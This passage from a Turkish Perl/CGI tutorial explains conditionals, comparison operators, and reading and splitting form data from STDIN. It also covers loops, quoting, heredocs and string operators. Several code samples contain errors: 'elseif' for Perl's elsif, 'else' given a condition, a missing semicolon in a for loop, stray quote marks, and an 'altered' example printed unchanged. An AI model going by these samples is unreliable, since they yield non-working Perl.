kullanıyoruz; REQUEST_METHOD’un içeriği POST ise bu kez standart girdiği veri kümesini (STDIN)
kullanacağız. Fakat REQUEST_METHOD’un içeriği boşsa, yani Form’da METHOD özelliği boş bırakılmışsa,
hiç bir şey yapamayız! Bu durumda Internet ziyaretçimize bir hata mesajı yollayabiliriz: “Form’da hata
var!”

Perl’de mantık şöyle çalışır: Eğer filanca koşul doğru ise şunu yap; değilse bunu yap! Dolayısıyla Perl
açısından if sınavının bir argümanı olur: mantıksal bir değer. Söz gelimi, Sayı 1’in değeri 5 ise, Sayı 2’nin
değeri 7 ise Perl’e şu mantık sınavını verirseniz:

Eğer Sayı 1, Sayı 2’den büyükse, “Sayı 1, Sayı 2’den Büyüktür!” yaz;
Değilse “Sayı 2, Sayı 1’den Büyüktür!” yaz

Perl “Sayı 2, Sayı 1’den Büyüktür!” yazar. (Sayıların eşit olmasını nasıl sınayacağımıza birazdan
geleceğiz.) Şimdi bunu Perl’ün anlayacağı deyim şekline çevirelim:

       $Sayi1 = 5;

       $Sayi2 = 7;

       if($sayi1 > $Sayi2) {

         print “Sayı 1, Sayı 2’den büyüktür”;

       } else {

         print “Sayı 2, Sayı 1’den büyüktür”;

       }Perl, mantıksal sınamaları, sadece sayılarla değil String’lerle de yapabilir. Fakat bu kez kullandığımız
karşılaştırma işlem işaretleri farklı olur.

////////////////////////////KUTU////////////////////////

Karşılaştırma Operatörleri


Karşılaştırma Matematik İşlemleri        String İşlemleri

Eşittir              ==           eq
CGI / Perl                                             53
Eşit değildir            !=          ne

Küçüktür              <           lt

Büyüktür              >           gt

Küçük veya eşittir         <=          le

Büyük veya eşittir         >=          ge

/////////////////////////////////////////KUTU BİTTİ//////////////////////

Bir karşılaştırmada, ileri sürdüğümüz iki koşul da doğru değilse, bir üçüncü, dördüncü.. n’nci koşulu
arayabiliriz. Bunu “elseif” deyimi ile yaparız. Şu senaryoyu zihninizde canlandırın:

if(şart1) { işlem1 }

     elseif(şart2) { işlem2 }

     elseif(şart3) { işlem3 }

     elseif(şart4) { işlem4 }

     else(şart5) { işlem5 }

Bu, Perl açısından sırasıyla şu sınamaların yapılması demek:

1. Şart 1 doğru ise işlem 1’i yap; değilse bir sonraki satıra bak; ne komut görürsen onu icra et!

2. Şart 2 doğru ise işlem 2’yi yap; değilse bir sonraki satıra bak; ne komut görürsen onu icra et!

3. Şart 3 doğru ise işlem 3’i yap; değilse bir sonraki satıra bak; ne komut görürsen onu icra et!

4. Şart 4 doğru ise işlem 4’i yap; değilse bir sonraki satıra bak; ne komut görürsen onu icra et!

5. Şart 5 doğru ise işlem 5’i yap; değilse bir sonraki satıra bak; ne komut görürsen onu icra et!

elseif deyimini kullandıysak, else‘e gerek kalmaz; ama programcılık geleneğine göre, else daima
kullanılır.

eğer...değilse şeklindeki mantık testlerinin bir diğer türü “değilse” sınavı olabilir. Yani “Sayı2 5’e eşit
değilse şunu yap!” gibi. Bunu unless karşılaştırma deyimi ile yazarız:

     unless ($ad eq ‘Mustafa7) {

     print “Senin adın Mustafa değil!” }

unless deyimi yerine if deyimini not karşılaştırma operatörüyle birlikte kullanabiliriz:

     if(not($ad eq ‘Mustafa’)) {
CGI / Perl                                              54
    print “Senin adın Mustafa değil!” }

Şimdi programımıza dönelim ve bu öğrendiklerimizin nasıl uygulandığını görelim. Programda çevre
değişkenlerini tutan %ENV İlişkili Dizi değişkeni içindeki REQUEST_METHOD anahtarının değerinin GET’e
eşit olup olmadığını sınıyoruz. if deyimi ile yaptığımız sınamanın sonucu doğru ise (yani
REQUEST_METHOD anahtarının değerinin GET’e eşit ise) ilk komut-deyim bloku icra edilecektir. Bu
blokta yapılacak iş, çevre değişkenlerinden QUERY_STRING’in içindeki String’i split fonksyonu ile “&”
işaretlerinden bölümlere ayırmaktır. Bu işlem sonucu ortaya çıkan bağımsız String’leri @girdi dizi
değişteninde (Array) toplayacağız.

Fakat ya yaptığımız sınama doğru değilse, yani REQUEST_METHOD anahtarının değeri GET’e eşit
değilse? Bu durumda iki şey olabilir: ya bu değer POST’a eşittir; ya da değildir. Peki, önce bu değerin
POST’a eşit olup olmadığını sınayalım. Bunu elseif ile yapabiliriz. Bu sınamanın sonucu doğru, yani
REQUEST_METHOD anahtarının değeri POST’a eşitse, bu kez STDIN’in içeriği ile ilgileneceğiz (ki bunu
nasıl yaptığımızı biraz sonra ele alacağız). Peki, REQUEST_METHOD anahtarının değeri POST’a da eşit
değilse? Bir Form’un METHOD özelliği ya POST, ya da GET olur. Eğer ikisi de değişse, o zaman Form’da
hata var demektir. Bunu sonuncu else deyimine bırakıyoruz; Browser’a hata mesajı yolluyoruz.

Formu biz tasarladığımıza ve Form verilerini hangi yöntemle gönderdiğimizi bildiğimize göre Perl
programımızın başında neden böyle bir sorguya ihtiyaç var? Aslında yok! Fakat iyi bir programcı
geleneği, hiç bir şeyi şansa bırakmamaktır; belki bizden sonra iş ortaklarınızdan veya çalışma
arkadaşlarınızdan biri, veya kız kardeşiniz sizin verdiğiniz gönderme yöntemini beğenmemiş ve Form’da
değişiklik yapmış olabilir! Yukarıdaki HTML kodunu değiştirmemek şartıyla, Perl programının bu
bölümünü şöyle yazabilirdik:

 read (STDIN, $depo, $ENV{'CONTENT_LENGTH'});

 @girdi = split(/&/, $depo);
Oku bakiim!


Tabiî buradaki “read()” fonksiyonu dikkatinizi çekmiş olmalı. Neyi okuttuğumuzu ve nasıl okuttuğumuzu
ele almadan önce bildiklerimizi bir tazeliyelim: CGI ile bulunduğu Web Server ve ona evsahipliği yapan
işletim sisteminin ilişkilerini gözden geçirirken HTTP Server’ın CGI’a iki türlü bilgi aktardığından söz
etmiştik. HTTP Server, Internet’ten GET yoluyla bilgi alıyorsa, bu bilgileri çevre değişkenlerinden
QUERY_STRING’e depoluyor; POST ile alırsa, standard girdi yöntemini kullanarak, STDIN’in içine
koyuyordu. Bu arada STDIN’in yeni boyutu da çevre değişkenlerinden CONTENT_LENGTH’in içine
yazılıyordu.

Şimdi, QUERY_STRING ile sizin oluşturduğunuz bir değişkenin hiç farkı yoktur; fakat standard girdi
denilen “bilgi tutma alanı” farklıdır. Teknik ayrıntılarına girmeden belirtebileceğimiz başlıca fark,
STDIN’in içeriği değişken gibi işlenmez; dolayısıyla önce STDIN’in içeriğini bir değişkene aktarmakta


CGI / Perl                                            55
yarar var. STDIN, tıpkı bir dosya gibi okunabilir; dolayısıyla içindeki bilgileri aslında daha sonra sabit
diskten dosya okumakta kullanacağımız READ fonksiyonuyla okuyabiliriz. Bu fonksiyonun dört argümanı
bulunabilir:

1. Okunacak dosya için oluşturacağımız tutamak (Handle)

2. Okunacak şeyin içine konacağı değişken

3. Okunacak şeyin uzunluğu

4. Okunacak şeyin başladığı konum, pozisyon

Derler ki, Perl’de iki şey vardır: Tekil/Scalar değişken ve dosya tutamağı! Diğer herşey bu iki ögeden
türer! Dosya açma, okuma yazma bahsine ve dolayısıyla tutamağın önemine daha sonra döneceğiz;
şimdilik sadece şunu bilmek yeterlidir: Perl’ün açacağı dosya için dosya adından başka değişken adına
ihtiyacı vardır ve buna tutamak (Handle) denir. Bunu, Perl’ün bir dosyaya kendi içinde verdiği özel bir
isim olarak bakabilirsiniz. Standard girdiler ise Perl (diğer bütün Unix programlama dilleri) için açılmış
dosya demektir; açılmış ve bir tutamak verilmiş özel bir dosya türü. Tutamağın adı STDIN’dir ve bizim
sabit diskte bulunan ve okumak-yazmak için açacağımız bir düz yazı dosyası gibi işlem görür. Bu özel
“dosya” içindekileri de okurken, bir değişkenin içine okumak gerekir; read fonksiyonunun ikinci
argümanı bunu sağlar. Perl’e okuyacağı şeyin boyutunu, uzunluğgunu söylemeniz gerekir; bu üçüncü
argüman olarak yazılır. Dördüncü ve verilmesi zorunlu olmayan argüman ise okumaya başlanacak
byte’dır. read fonksiyonu sabit diskteki binary dosyaları okumakta kullanıldığı ve bu dosyaların içeriği
sabit diskte byte ölçüsüyle yazıldığı için, konumu byte olarak belirtiriz. Dosyalarımızı genellikle baştan
okuttuğumuz için bu argüman genellikle 0 olur.

read fonksiyonunun işleyebilmesi için okuduğu şeyi içine yazacağı bir tekil/Scalar değişken göstermemiz
gerekir. Neden tekil/Scalar değişken de dizi değil? Çünkü STDIN’in içindeki herşey, Form’dan gelen bir
String’dir. Browser’ın Form verilerini yumak yapıp gönderdiğini hatırlıyor musunuz? Burada “$depo”
adını verdiği değıişken, okunan STDIN değerlerini tutacaktır.

Dosya okuma konusunda daha öğrenebileceğimiz çok şey var; STDIN’i okumak için bu kadar bilgi yeter;
fakat şunu belirtmek gerekir: Okumaya çalıştığımız dosyanın boyutunu tam olarak belirtmezsek, Perl
bilgileri eksik alabilir veya dosyanın bittiği yeri geçer ve dosyaya ait olmayan şeyleri de okuyabilir.
Dolayısıyla STDIN’in içerdiği herşeyi okutabilmek için okutacağımız şeyin uzunluğunu çevre
değişkenlerinden CONTENT_LENGTH’den öğreniyoruz. Çevre değişkenleri Perl tarafından %ENV adlı
özel bir İlişkili Dizi’nin içinde tutulur ve bu dizideki CONTENT_LENGTH anahtarının değerini
“$ENV{'CONTENT_LENGTH'}” deyimi ile öğrenebiliriz.

Peki, “read (STDIN, $depo, $ENV{'CONTENT_LENGTH'});” deyimini irdelediğimize göre, şimdi
programımızın diğer bölümlerine bakabiliriz. Kodumuzun iş yapan bölümündeki diğer deyim şöyle:

@girdiler = split(/&/, $depo);
CGI / Perl                                             56
split işlevini tanıyoruz: bir değişkenin içeriğini alıyor ve verdiğimiz bölme noktası karakterinden
bölümlere ayırıyor. Burada “$depo” değişkenin içerdiği String’i (ve anlamına gelen) ampersand (&)
işaretinden böldürüyoruz; elde edilecek bağımsız String’leri “@girdiler” dizi-değişkenine (Array)
yazdırıyoruz. Browser’ın Form verisini nasıl yumak yaptığını hatırlıyor musunuz? (İpucu:
“isim=Mustafa+Durcan&yas=23”) Browser, Form’daki her bir alanın adı eşittir (=) işaretiyle Form’u
tasarlayan veya dolduran kişinin verdiği değerle birleştirip, sonra bunları ampersand (&) işaretiyle
birbirine bağlıyordu. Hatırlarsanız, bu arada boşlukların yerine artı (+) işareti konuyor; ayrıca özel
karakterlerin yerine de Heksadesimal değerleri yazılıyordu.

$depo değişkeni içindeki String, & işaretinden bölümlere ayrılırsa, elimizde ne kalır? Şunun gibi bir şey:

@girdiler[0]...adi=Mustafa+Durcan

@girdiler[1]...Adres=Web+Teknikleri%2C+Istanbul

@girdiler[2]...Gonder=G%F6nder

@girdiler[3]...Kod=34000

@girdiler[4]...Merak=Siir

@girdiler[5]...eposta= mdurcan@webteknikleri.com

@girdiler[6]...mesaj=Mutluluklar+dileriz

@girdiler[7]...yuksek=ON

Burada boşlukların yerine artı (+) işareti konduğuna ve mesela virgül’ün yerine heksadesimal değeri
olan “%2C”, ö harfi yerine “%F6” yazıldığına dikkat edin.

Döngüler


Kodumuzu irdelemeye devam edersek, karşımıza çıkan deyimin bir döngü ifadesi olduğunu görüyoruz.
Döngü (loop) programcılığın varolma sebebidir! Herhangi bir programın bir kerede yaptığı işi nasıl olsa
herkes elle kendisi yapabilir. Fakat aynı iş defalarca tekrar edecekse, bilgisayara ve bilgisayarın bi işi
yapmasını sağlayacak olan programa ihtiyaç var demektir. Perl’e bir işi sonuçlanıncaya kadar yaptıran,
yani başa dönerek, aynı işi yeniden yapmasını sağlayan bir kaç döngü deyimi vardır. Bunlar while,
next..last, for ve foreach deyimleridir.

Bir programın icrası sırasında değişkenlerin değeri değişebilir. (Boşuna ‘değişken’ demiyoruz, değil mi?)
while karşılaştırma deyimi, tıpkı yukarıda ele aldığımız if gibi bir değişkenin değerinin belirli bir değere
eşit kalması halinde doğrudur; ve sınama sonucu doğru ise sonraki, değilse while blokunu izleyen ilk
deyim icra edilir. Bir örnek verelim:

$sayac = 0;CGI / Perl                                             57
while($sayac < 10) {

    print “Sayaç değişkenin değeri: $sayac\n”;

        $sayac += 1;

}

print “sayaç değişkeni $sayac oldu!”;

Burada Perl, $sayac’ın değeri 10’un altında olduğu sürece ekrana “sayaç değişkeninin değeri:”
kelimelerini ve değişkenin o andaki değerini yazdıracak ve değişkenin değerini 1 arttıracaktır. (Aritmetik
işlemlere sonra daha yakından bakacağız!) while blokunun sonu olan süslü paranteze ulaştığında Perl,
bu blokun başına dönecek ve verdiğimiz koşulu yeniden sınayacaktır. $sayac değişkeni eğer halâ 10’un
altında ise, Perl while deyimini yeniden icra edecek yani ekrana “sayaç değişkeninin değeri:”
kelimelerini ve değişkenin o andaki değerini yeniden yazdıracak ve değişkenin değerini 1 arttıracaktır.
Ta ki, sınama sonucu $sayac değişkeninin değerinin 10 olduğunu gösterinceye kadar. Perl bunu
belirlediği anda while blokunun dışına çıkacak ve son deyimi icra edecektir.

Bu arada, while() fonksiyonu ile döngünün yazılışına dikkat edin: döngü bloku, yani while() için ileri
sürdüğünüz koşulu içeren parantez kapandıktan sonraki bölüm, süslü parantez içinde ve bu bloku
kapatan süslü parantezden sonra noktalı virgül yok.

while blokunda sonsuz-döngü denen hataya düşmek çok kolaydır. Perl, bir türlü gerçekleşmeyen while
koşulu ile karşılaştığı zaman sonsuza kadar bu blokun içinde kalır. Bu durumda ne olur? Yukarıdaki
kodda şu değişikliği yapın ve sonucu görün:

        $sayac = 0;

Dikkat! Bu sonsuz-döngüden çıkmanın tek yolu, Browser’ı kapatmaktır!

while ne kadar kullanışlı olursa olsun, bir programda karşılaşabileceğimiz her türlü koşulu sınamaya
yetmez. onun eksik bıraktığı durumları, for ve foreach ile karşılayabiliriz.

for deyimi sınadığınız koşul gerçekleşinceye kadar devam eder. Yukardaki sayaç örneğini for için
yazalım:

for ($sayac = 0 ; $sayac < 10 $sayac += 1) {

    print “Sayaç değişkeni: $sayac”;

    }

    print “Sayaç değişkeni: $sayac oldu!”;

Bu kodun yaptığı işlem yukarıdaki while ile aynı olduğu için for deyiminin ne kadar kullanışlı olduğu
görülemeyebilir. Fakat aşağıdaki kodu Not Defteri ile yazar ve mesela hex.pl adıyla kaydederek,
CGI / Perl                                            58
çalıştırırsanız; 255’e kadar ondalık sayıları 16 tabanlı sayı sistemine (Heksadesimal) çevirebilirsiniz.
(Şimdilik ele almadığımız fonksiyonlara ve deyimlere aldırmayın!)

 #!/usr/local/bin/perl

 #hex.pl

 print "HTTP/1.0 200 OK\n";

 print "Content-Type: text/html\n\n";

 print "<HTML>\n";

 print "<HEAD>\n";

 print "<TITLE>HEX</TITLE>\n";

 print "<meta http-equiv=\"content-type\" content=\"text/html; charset=ISO-
 8859-9\">\n";

 print "<meta http-equiv=\"Content-Type\" content=\"text/html;
 charset=windows-1254\">\n";

 print "</HEAD>\n";

 print "<BODY>\n";

 print "<H4>Desimal - Heksadesimal Çevirmeni</H4>\n";

 @Heksadesimal = ('0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'A',
 'B', 'C', 'D', 'E', 'F');

 for($i = 0; $i <= 255; $i++) {

 print sprintf("%3s", $i), "=", $Heksadesimal[int($i / 16)],
 $Heksadesimal[$i % 16], " ";

     if(($i % 8) == 7) {

     print "\n"

     }

 print "<br>\n";

 }

 print "</BODY>\n";

 print "</HEAD>\n";

 print "</HTML>\n";
CGI / Perl                                             59
/////////////////////////KUTU///////////////////////

Tek Tırnak.. Çift Tırnak..


Perl’de tek tırnak-çift tırnak farkına daha önce değindik ve tek tırnak içine aldığınız String’in içinde
sadece ekranda görüntülenebilen karakterler yer aldığını belirttik. String’lerimiz görüntülenemeyen
karakter değerlerini içeriyorsa, bu dizeyi mutlaka çift tırnak içine almamız gerektiğini belirttik. Tek
tırnak-çift tırnak farkının bir diğer sonucunun ise String’in içine değişken koyduğumuz zaman ortaya
çıktığını söyledik. Şu örneğe bakın:

$ad = ‘Mustafa’

print ‘Senin adın $ad.’

Bu durumda ekranda şu sonucu elde ederiz:

Senin adın $ad.

Perl’ün verdiğimiz String içinde yer alan değişkenin değerini bularak, değişken adı yerine değerini
koymasını istiyorsak, print() fonksiyonunu çift tırnakla yazmamız gerekir:

$ad = ‘Mustafa’

print “Senin adın $ad.”

Bu durumda şu sonucu elde ederiz:

Senin adın Mustafa.

/////////////////////KUTU BİTTİ////////////////////////////////

    Bu örneklerde de gördüğümüz gibi, for deyiminin üç bölümü vardır; sınanmasını
istediğimiz değişkenin başlangıçtaki durumu ($sayac = 0), sonra aranacak koşul ($sayac <
10) ve bu koşul gerçekleşinceye kadar her adımda değişkende olacak değişiklik ($sayac +=
1), ve her adımda icra edilecek komutlar ve deyimler. for deyimi sınanan koşul
gerçekleşinceye kadar kendi bloku içinde devam eder; koşul yerine gelir gelmez, bloku
izleyen ilk deyime geçer.

    Kimi zaman sınamayı bir değişkenin bir listeden alacağı bütün değerler için tek tek
yapmak isteriz. Burada kilit kavram işlemin tek tek bütün değerler için yapılacak olmasıdır.
Ki, bu deyimle, yola çıktığımız form_analiz.pl programındaki foreach deyimine dönmüş
oluyoruz!
CGI / Perl                                             60
    Form ile aldığımız ve “@girdiler” dizi-değişkenine, tabir yerinde ise, üstüste yığdımız
değerleri şimdi tek tek ele alıp, bir işlemden geçirip, daha düzenli şekilde kullanılabilir
değişken/değer çiftleri haline getirebiliris. Bu anlamda foreach deyimi mantıksal bir
sınamadan çok bir listedeki bütün değerler için ayrı bir işlem yapılması sayılabilir.
form_analiz.pl programının ilk foreach deyimini hatırlayalım:

    foreach $girdi (@girdiler) {

       ($anahtar, $deger) = split (/=/, $girdi);

    Program bu deyimlerde, “@girdiler” dizisinin her bir elemanını tek tek ele alıp, bunu
içindeki eşittir (=) işaretinden ikiye bölüp, birinci bölümünü “$anahtar”, ikinci bölümünü ise
“$deger” değişkenine yazacaktır.

Bu aşamada, “@girdiler” dizisinin içindeki her bir elemanını alıyoruz, bunu $girdi değişkenine atıyoruz.
@girdiler’in sözgelimi birinci elemanını hatırlarsak, döngünün lik adımında $girdi değişkeninin değeri bu
String oluşturacak; yani, $girdi’nin değeri “adi=Mustafa+Durcan” olacaktır. Ve split fonksiyonu bu
String’i eşittir işaretinden ikiye bölerek, “adi” kelimesini $anahtar değişkenine, “Mustafa+Durcan”
kelimelerini $deger değişkenine atayacaktır. (İkinci adımda bu kez “Adres” kelimesi $anahtar
değişkenine, “Web+Teknikleri%2C+Istanbul” String’i ise $deger değişkenine atanacaktır.)

Programımızın daha sonraki bölümlerinde bu iki değişkenin içinde bazı metin düzenleme işlemleri
yaptıran (eşittir ve tilde işaretleri “=~” bulunan satırlar) deyimler var, ki onlara daha sonra döneceğiz.

////////////////////KUTU/////////////////////

Metinleri birbirine Nokta ile ekleyebiliriz


Perl’ün metin düzenleme fonksiyonlarına ayrıntılı olarak bakacağız; burada sadece “.=” işlemi üzerinde
kısaca duralım.

Sayıları toplarız; String’leri ekleriz. Perl, mükemmel bir rapor yazma dili olarak icad edildiği için olacak,
bir çok metin düzenleme aracına ek olarak, özel bir metin ekleme operatörüne sahiptir: Nokta. Bunu bir
örnekle anlatmak daha kolay:

$metin1 = ‘kara’;

$metin2 = ‘deniz’;

print $metin1 . $metin2;

bize, tahmin ettiğiniz gibi şunu verir:

karadeniz
CGI / Perl                                             61
Belki ekrana doğrudan “karadeniz” yazdırmanın daha kolay yolları bulunabilir; ama nokta ile metin
ekleme işlevinden özellikle mevcut bir değişkenin sonuna yeni ek yaptırmakta yararlanabiliriz.

Diyelim ki, şöyle bir liste yapıyoruz:

$arkadaslar = “Mustafa, Osman, Vildan, Kudret”

Fakat programın daha ileri bir aşamasında $yeni_arkadaslar değişkenine yeni isimler eklediniz. Şimdi bu
iki listeyi birleştirmeniz gerekiyor. Değişkenin tümünü yazmak yerine, Perl’e, “Bu değişkeni al,
içindekileri şu değişkenin içindeki String’in sonuna ekle!” demek daha kolay olabilir:

$arkadaslar = $arkadaslar . $yeni_arkadaslar;

Eğer bu da size çok zahmetli görünüyorsa, Perl’ün şu kolaylığından yararlanabilirsiniz:

$arkadaslar .= $yeni_arkadaslar;

/////////////////////////////KUTU BİTTİ////////////

    $anahtar ve $deger değişkenlerimizin içinde döngünün her adımında sadece birer
String var ve ikinci adıma geçmeden önce bu String’leri temelli bir yere yazmak
zorundayız; ki ikinci adımda @girdiler’in bir sonraki değerini alalım. İki String’i yanyana
alabiler ve birincisini ikincisinin endeksi (Perl diliyle anahtarı), ikincisini de birincisinin
değeri yapabileceğimiz değişken türü İlişkili Dizi (Hash, associative Array) listesidir. Şimdi
eğer foreach döngüsünün birinci adımında elimizdeki iki değişkeni bir İlişkili Dizi’ye atarsak,
döngünün ikinci adımında $anahtar ve $değer değişkenlerine @girdiler’den yeni Stringler
alabiliriz. İlişkili Dizi oluşturmanın çeşitli yollarını ele almıştık; bunlardan biri şuydu:

    $iliski_dizi_degisken_ismi{$anahtar_ismi_olacak_deger} = $deger_olacak_deger

    Bunu bir örnekle yazalım:

    $formveri{$anahtar} = $deger;

    Buradaki süslü parantezi görünce Perl, bir İlişkili Dizi oluşturmak istediğimizi ve
onun bir anahtarı olarak $anahtar adlı değişkenin değerini, bu anahtarın karşıtı olan değer
olarak da $deger değişkenin değerini atamak istediğimizi anlar; “%formveri” adındaki
İlişkili Dizi değişkeni oluşturur, birinci kaydın anahtarı olarak $anahtar değişkeninin o
sıradaki değerini, değeri olarak da $deger değişkeninin o andaki değerini atar. foreach
döngüsünün birinci adımında $anahtar’ın değeri “adi”, $deger’in değeri ise içinden artı
işaretini atıp yerine boşluk koyduğumuz “Mustafa Durcan” idi. İkinci adımda, %formveri’nin
ikinci kaydının anahtarı “Adres”, değeri ise “Web Teknikleri..” olacak ve bu foreach’in
sonuna kadar devam edecek. foreach ise @girdiler’in son elemanının işlenmesi ile sona
erecek.


CGI / Perl                                           62
Dikkat etmiş olacağınız gibi %formveri’nin kayıtlarını da if ile bir mantık süzgecinden geçiriyoruz.
Form’larımızda, bazen aynı alan adına sahip olabilen INPUT etiketleri bulanabilir. Bu etiketler dolayısıyla
Form’dan CGI’ya gelen veri yumağında daha sonra İlişkili Dizi’me anahtar olarak yazılmak üzere aynı
kelimeden birden fazla bulunabilir. Bunu kabul edemeyiz, çünkü İlişkili Dizi’lerde anahtarların özgün,
yani bir adet olması gerekir. foreach döngüsünün sonundaki bu if deyimi, o anda elimizdeki anahtarın
daha önce diziye yazılıp yazılmadığını sınamaktadır. %formveri’de bu adla daha önce yazılmış anahtar
varsa, o anda $değer’in tuttuğu String, daha önce yazılmış anahtarın kartışı olan değerin sonuna, virgül
ile eklenecektir ($formveri{$anahtar} .= ", $deger";); eğer henüz bu anahtar diziye yazılmamışsa, kendisi
özgün bir kaydın anahtarı, o andaki $deger de değeri olacaktır ($formveri{$anahtar} = $deger;).

form_analiz.pl’in geri kalan bölümü, %formveri dizisinin anahtar/değer çiftlerini ekrana yazdırmaktan
ibaret.

Buraya kadar aslında büyük iş başardık diyebiliriz. Bir çok kişinin belki de CGI ve Perl ihtiyacının başlıca
kaynağı olan Form bilgisini alıp, işlemeyi ve bunu ekrana dökmeyi başardık:

<cgi-perl012.tif>

Şimdi ekrandaki bu döküm işleminin biraz daha düzenli olmasını sağlayalım ve bu veriyi ekrana değil de
HTTP Server’ın bulunduğu bilgisayarda sabit diske yazdıralım.
CGI / Perl                                             63
       Metin, Sayı ve Dosya İşlemleri


Şimdi artık Perl bildiğinize göre.. Evet, evet; hiç merak etmeyin; buraya kadar örnekleri birlikte yaptık ve
ele aldığımız fonksiyonları ve deyimleri kullanabilir hale geldi isek, Perl biliyoruz demektir.

Şimdi bu kadar Perl ile neler yapabileceğimize gelelim.

Perl ile matematik işlemleri yapabiliriz; metin oluşturur, sabit diskteki metin dosyalarından veya
Internet’ten metin alabiliriz, bu metinleri yeniden biçimlendirebiliriz, ve aldığımız ya da oluşturduğumuz
metinleri ya Internet’te birilerine göndeririz, ya da daha sonra gönderilmek üzere sabit diske yazabiliriz.
Bu cümleye bakarsanız, Perl ile neredeyse dünyayı yönetebiliriz! (Düşünürseniz, dünyayı yönetmek de
sadece buradaki işlemleri yapmaktan ibaret!)

Burada ifade ettiğimiz işlevlerin, dosya işlemleri hariç, hemen hepsini önceki bölümde gördük ve hatta
kullandık. Bu bölümde bu işlerin biraz teorisine ve bol bol örneğine bakacağız ve dosya işlemleri ile
ilgisini göreceğiz. İnternet sitenizi ziyaret edenlerin dolduracağı Form’ların bir yerlere kaydedilmesini
isteriz sonuç itibariyle, değil mi?

Önce biraz Perl reklamı!

Perl, adından da anlaşılacağı gibi bir rapor yazma dilidir. Yani Perl ile yazacağınız programlar, bir yerden
bilgi çeker ve bilgiyi rapor haline getirirler. Dolayısıyla Perl’ün çok güçlü metin ve sayı düzenleme
araçları vardır. Bu araçlara değinmeden önce, benim daima “Hangisi hangisiydi?” diye karıştırdığım tek
tırnak-çift tırnak meselesini yeniden hatırlayalım. Bu karışıklığın kaynak noktası, görünürde iki tür tırnak
işaretinin de aynı işlevi yapıyor olmasıdır. Örnek:

$Metin1 = “Merhaba Dünya!”;

$Metin2 = ‘Sana da merhaba, ey ademoğlu!’;

print $Metin1;

print $Metin2;

Bu programı çalıştırın ve ekranda okuduğunuz yazılara lütfen dikkat edin; sonra $Metin1’i tek-tırnak,
$Metin2’yi çift tırnak işareti içinde tanımlayın ve programı tekrar çalıştırın. Ne değişti? Hiç bir şey.

Bu duruma bakarak, ilk görüşte Perl’de tek tırnak işareti ile çift tırnak işaretinin farkını önemsememek
mümkündür. Fakat bu ilerde büyük hatara yol açabilir. Tekrar özetlersek (bu sayfanın köşesini kıvırsanız
iyi olur!)B tek tırnak işareti içindeki herşeyi aynen yazadırır; çift tırmak işareti içindeki değişkenlerin
değerlerini, özel işaretlerin de temsil ettikleri karakterlerin yazılmasını sağlar.

Yukarıdaki programı şöyle değiştirebilirsiniz:
CGI / Perl                                             64
$Metin1 = ‘Sana da merhaba, ey ademoğlu!’;

print ‘Merhaba Dünya... $Metin1’;

Programı çalıştırın. Güzel! Değişkenin değerini değil adını okumuş olmalısınız:

    Merhaba Dünya... $Metin1

Programınızda print() fonksiyonundaki tek-tırnak işaretlerini çift tırnak yapın ve yeniden çalıştırın:

$Metin1 = ‘Sana da merhaba, ey ademoğlu!’;

print ‘Merhaba Dünya... $Metin1’;

Merhaba Dünya... Sana da merhaba, ey ademoğlu!’

Çift tırnak işaretinin bir diğer marifeti, içindeki özel karakter simgelerinin yerine bu karakterleri
koymasıdır:

$Metin1 = ‘Sana da merhaba, ey ademoğlu!’;

print “\$Metin1 = $Metin1”;

Burada Perl’ün ekrana yazdığı “$Metin1” kelimesi aslında bizim değişkenimizin adı değil, ekrana
yazdırdığımız özel Dolar işareti ile Metin1 kelimesinden ibarettir:

$Metin1 = Sana da merhaba, ey ademoğlu!

Ekrana tek veya çift tırnak yazdırmak için de \’ ve \” işaretlerini kullanmanız gerekir. Fakat bu bir süre
sonra epey zahmetli olmaya başlar. Perl, bizi bundan da kurtarabilir. Bunu içinde özel karakterler olan
metnimizi q/.../ ve qq/.../ işaretleri arasına alarak yapabiliriz:

$Metin1 = q/Bu metnin içinde özel işaret (%, &, $) ‘ ve “ bulunuyor./;

Burada q/.../ ile qq/.../ tıpkı tek tırnak-çift tırnak farkına yol açar:

$Metin1 = “Merhaba Dünya!”;

$Metin2 = qq/$Metin1.. Sana da merhaba evlad!/;

q ve qq işaretlerinden sonra sınırlayıcı olarak “/.../” işareti gibi parantez “(...)”, köşeli parantez “[...]”,
süslü parantez “{...}” ve büyüktür-küçüktür “<...>” işaretlerini kullanabilirsiniz. Burada dikkat edilecek
nokta başta kullandığınız işareti sonda da kullanmaktır.

//////////////////////////////KUTU///////////////////////////
CGI / Perl                                               65
Uzuuuuun metin


Perl’ün sizi çok uzun metinleri tırnak işareti içine almaktan kurtaran bir kolaylığı vardır; bunu << işareti
ve bir sınırlama String’i ile yapabiliriz:

$Uzuuun_metin = <<"uzun_metin";

Insanoğluna en çok güç veren unsurların başında sevilmek gelir. Fakat
kişinin sevildiğini kabul etmesi zordur; hele herşeyin çıkara
dayandığı çağımızda, karşılıksız sevgiyi görünce tanımak, tanıyınca
kabul etmek hiç de kolay olmuyor. --Immanuel L'Avanger

uzun_metin

print $Uzuuun_metin;

Burada $Uzuun_metin değişkenin adı, “uzun_metin” ise sınırlama String’idir. Snırlama String’ini uzun
metnin hem başında, hem de sonunda kullanıyoruz. Sınırlama String’ini tek tırnak içine alırsanız, diğer
yöntemlerde tek tırnak kullandığınız durumlardaki gibi, metnin içinde değişken adı ve özel karakter
kullanamazsınız; sınırlama değişkenini çift tırnak içine alırsanız, uzun metnin içinde değişken adı
kullullanılırsa. Perl onun yerine değişmenin değerini koyar.

///////////////////////////////KUTU BİTTİ///////////////////////

Metin Biçimlendirme


Perl’de metin içeren değişkenlerle özellikle print() fonksiyonunda kullandığımız tek ve çift tırnak
işaretlerinin ilişkisini ayrıntılı olarak görmenin ne kadar yararlı olduğu birazdan belli olacak. Şimdi
metinler ve metin içeren değişkenlerle neler yapabileceğimize bakabiliriz. Herşeyden önce, Perl,
metinlerle dört işlem yapmanıza izin verir; ama bu dört işlem aritmetikten biraz farklı sonuç verir:

Toplama: Daha önce değindiğimiz metin düzenleme araçlarından biri, iki String’i birbirine eklemekte
kullandığımız nokta (.) işareti idi. (Örnek: print “kara” . “deniz”) Bu imkandan sabit metinlerle
değişkenleri birleştirmekte yararlanabiliriz.

    print “Bu sayfa $tarih” . “\’de güncelleştirildi!”

Çarpma: Perl’ün metin toplama fonksiyonu nokta işareti ise, metin çoğaltma fonksiyonu da çarpma (x)
işaretidir. Perl’de bu fonksiyona tekrarlama (Repetition) denir. (x’in, küçük harf olmasına dikkat edin)
Örnek:

    print “Merhaba Dünya..” x 10

